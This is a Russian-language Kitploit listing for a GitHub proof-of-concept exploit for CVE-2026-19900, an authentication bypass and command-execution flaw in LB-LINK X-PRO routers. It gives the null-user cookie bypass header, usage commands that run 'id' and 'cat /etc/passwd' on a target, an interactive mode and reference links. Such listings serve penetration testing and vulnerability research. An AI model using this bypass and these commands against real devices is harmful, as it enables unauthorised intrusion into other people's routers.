Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2026-19900-PoC — Доказательство концепции эксплуатации для CVE-2026-19900 — уязвимости обхода аутентификации и удалённого выполнения кода в маршрутизаторах LB-LINK X-PRO, позволяющей выполнение команд с помощью специально сформированного cookie с пустым пользователем. | Kitploit
Инструменты/GitHubGitHub/on3sk-0x1/cve-2026-19900-poc
Безопасность IoTАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификация
GitHubon3sk-0x1/cve-2026-19900-poc

cve-2026-19900-PoC

Доказательство концепции эксплуатации для CVE-2026-19900 — уязвимости обхода аутентификации и удалённого выполнения кода в маршрутизаторах LB-LINK X-PRO, позволяющей выполнение команд с помощью специально сформированного cookie с пустым пользователем.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
5 ч 11 мин назадЕщё не проверено

CVE-2026-19900 LB-LINK X-PRO Обход аутентификации и RCE через null-пользователя

CVE-2026-19900 Жёстко заданные учётные данные и обход аутентификации с RCE через null-пользователя.

Обход через заголовок: Cookie:user=(null)

Использование

Соберите и запустите скрипт с целевым хостом:

root@kitploit:~
go build cve-2026-19900-PoC.go
./cve-2026-19900-PoC -t http://target:8080/ -c "id"

Без сборки

root@kitploit:~
go run cve-2026-19900-PoC.go -t http://target:8080/ -c "cat /etc/passwd"

Интерактивный режим

root@kitploit:~
./cve-2026-19900-PoC -t http://target:8080/ -i

Аргументы

  • -t: IP-адрес или имя хоста цели (обязательно)
  • -c: Отправить cmd-полезную нагрузку
  • -i: Интерактивный режим (не требуется -c <cmd>)

Шаблон Nuclei: (Шаблон от 0x_Akoko)

https://cloud.projectdiscovery.io/library/CVE-2026-19900

Ссылки

https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_cmd%20Indicates%20the%20unauthorized%20command%20injection/The%20LB-LINK_cmd%20command%20is%20used%20to%20inject%20information.md https://nvd.nist.gov/vuln/detail/CVE-2026-19900 https://github.com/DavCloudz/cve/blob/main/B-Link/B-Link%20AC1200%20X-PRO(AC6)%20Hardcoded%20Credentials%20Vulnerability.md https://vuldb.com/cve/CVE-2026-19900 https://vuldb.com/submit/870712

Скачать инструмент